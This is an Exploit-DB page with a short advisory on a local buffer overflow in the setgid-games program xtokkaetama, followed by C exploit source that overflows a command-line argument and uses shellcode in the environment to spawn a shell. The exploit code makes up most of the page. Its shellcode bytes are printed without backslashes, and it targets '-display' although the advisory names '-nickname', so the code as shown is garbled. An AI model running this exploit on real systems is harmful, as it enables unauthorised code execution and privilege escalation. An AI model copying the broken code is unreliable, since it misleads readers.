https://www.exploit-db.com/exploits/22985

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/8337/info
 
xtokkaetama is prone to a locally exploitable buffer overflow vulnerability. This is due to insufficient bounds checking of the '-nickname' command line option, which could result in execution of arbitrary code in the context of the software.
 
The software is typically installed setgid 'games'.

/*
 ** Linux/BSD x86 exploit vs xtokkaetama (c) gunzip
 ** I don't think you can do something nasty  
 ** with egid=games however (so this is mostly useless) 
 ** just written with the idea to make expl targetless.
 ** mostly ripped from gera's paper about bof :-o
 ** http://members.xoom.it/gunzip/
 ** gunzip@ircnet <[email protected]>
 **
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>

#define SIZE		20
#define PATH 		"/usr/games/xtokkaetama"

unsigned long STACKBASE() 
{
	__asm__ ( "movl	%esp,	%eax" );
}

/**
 ** linux and bsd execve shellcode by me
 **/
unsigned char shellcode[] = 	
	"x31xc0x99x52x68x2fx2fx73"
	"x68x68x2fx62x69x6ex89xe3"
	"x52x53x89xe1x52x51x53x54"
	"x8cxe0x85xc0x75x04xb0x0b"
	"xebx02xb0x3bxcdx80";

int main( int argc, char *argv[] )
{
	unsigned long	i, ret ;
	unsigned char	buf[ SIZE + 1 ],
			* env[]= { shellcode, NULL },
 			* run[]= { PATH, "-display", buf, NULL };

  	ret = ( ( STACKBASE() & 0xffff0000 ) | 0xfffa ) 
		- strlen(PATH) - strlen(shellcode) ;

	memset( buf, 0, sizeof(buf) );
  
  	for( i = 0; i < sizeof(buf) - 4; i += 4 ) 
		*(unsigned long *)&buf[i] = ret;

  	if( execve( run[0], (char **)run, (char **)env ) ) {	
		perror( "execve" );
		exit( -1 );
	}
}